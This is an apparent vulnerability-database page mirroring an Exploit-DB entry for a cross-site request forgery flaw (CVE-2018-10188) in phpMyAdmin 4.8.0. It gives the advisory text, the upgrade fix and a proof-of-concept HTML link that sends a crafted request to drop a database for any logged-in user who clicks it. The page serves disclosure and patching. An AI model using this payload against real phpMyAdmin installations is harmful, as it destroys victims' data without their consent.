Lucene search
K

phpMyAdmin 4.8.0 < 4.8.0-1 - Cross-Site Request Forgery

🗓️ 23 Apr 2018 00:00:00Reported by revengshType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 147 Views

phpMyAdmin CSRF vulnerability in /sql.php allows arbitrary SQL executio

Related
Code
ReporterTitlePublishedViews
Family
0day.today
phpMyAdmin 4.8.0 / 4.8.0-1 - Cross-Site Request Forgery Vulnerability
23 Apr 201800:00
zdt
AlpineLinux
CVE-2018-10188
19 Apr 201814:00
alpinelinux
Circl
CVE-2018-10188
25 Apr 202421:25
circl
CNVD
phpMyAdmin Cross-Site Request Forgery Vulnerability (CNVD-2018-09386)
11 May 201800:00
cnvd
CVE
CVE-2018-10188
19 Apr 201814:00
cve
Cvelist
CVE-2018-10188
19 Apr 201814:00
cvelist
Debian CVE
CVE-2018-10188
19 Apr 201814:00
debiancve
EUVD
EUVD-2022-5295
3 Oct 202520:07
euvd
exploitpack
phpMyAdmin 4.8.0 4.8.0-1 - Cross-Site Request Forgery
23 Apr 201800:00
exploitpack
Github Security Blog
phpMyAdmin CSRF vulnerability allowing arbitrary SQL execution
14 May 202203:22
github
Rows per page
# Exploit Title: phpMyAdmin 4.8.0 < 4.8.0-1 - Cross-Site Request Forgery
# Date: 2018-04-20
# Software Link: https://www.phpmyadmin.net/
# Author: @revengsh & @0x00FI
# CVE: CVE-2018-10188
# Category: Webapps


#1. Description
#The vulnerability exists due to failure in the "/sql.php" script to properly verify the source of HTTP request.
#This Cross-Site Request Forgery (CSRF) allows an attacker to execute arbitrary SQL statement by sending a malicious request to a logged in user.
#2. Proof of Concept: This example sends HTTP GET crafted request in order to drop the specified database.


<html>
  <body>
    <a href="http://[HOST]/phpmyadmin/sql.php?sql_query=DROP+DATABASE+[DBNAME]">
      Drop database
    </a>
  </body>
</html>

#3. Solution: Upgrade to phpMyAdmin 4.8.0-1 or newer.
#4. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10188

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 Apr 2018 00:00Current
8.7High risk
Vulners AI Score8.7
CVSS 26.8
CVSS 38.8
EPSS0.0065
147